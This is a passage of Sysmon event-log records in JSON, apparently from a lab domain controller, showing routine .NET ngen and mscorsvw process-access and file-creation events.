{"EventTime":"2020-08-01 05:58:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6769,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:28.058\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0484-5F25-0000-0010AE3D0D00}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:28.058","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0484-5F25-0000-0010AE3D0D00}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6770,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:28.183\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0484-5F25-0000-001065410D00}\r\nTargetProcessId: 4416\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:28.183","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0484-5F25-0000-001065410D00}","TargetProcessId":"4416","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6771,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:28.183\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0484-5F25-0000-001065410D00}\r\nTargetProcessId: 4416\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:28.183","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0484-5F25-0000-001065410D00}","TargetProcessId":"4416","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6772,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:28.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0484-5F25-0000-001065410D00}\r\nTargetProcessId: 4416\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:28.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0484-5F25-0000-001065410D00}","TargetProcessId":"4416","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6773,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:30.621\r\nProcessGuid: {A837DB8D-0484-5F25-0000-001065410D00}\r\nProcessId: 4416\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1140-0\\Microsoft.Build.Tasks.v4.0.dll\r\nCreationUtcTime: 2020-08-01 05:58:30.621","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:30.621","ProcessGuid":"{A837DB8D-0484-5F25-0000-001065410D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1140-0\\Microsoft.Build.Tasks.v4.0.dll","CreationUtcTime":"2020-08-01 05:58:30.621","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6774,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:30.714\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001045E70C00}\r\nTargetProcessId: 2392\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:30.714","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001045E70C00}","TargetProcessId":"2392","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6775,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:30.714\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001045E70C00}\r\nTargetProcessId: 2392\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:30.714","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001045E70C00}","TargetProcessId":"2392","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6776,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:30.714\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001045E70C00}\r\nTargetProcessId: 2392\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:30.714","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001045E70C00}","TargetProcessId":"2392","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6777,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:30.777\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010B6EA0C00}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 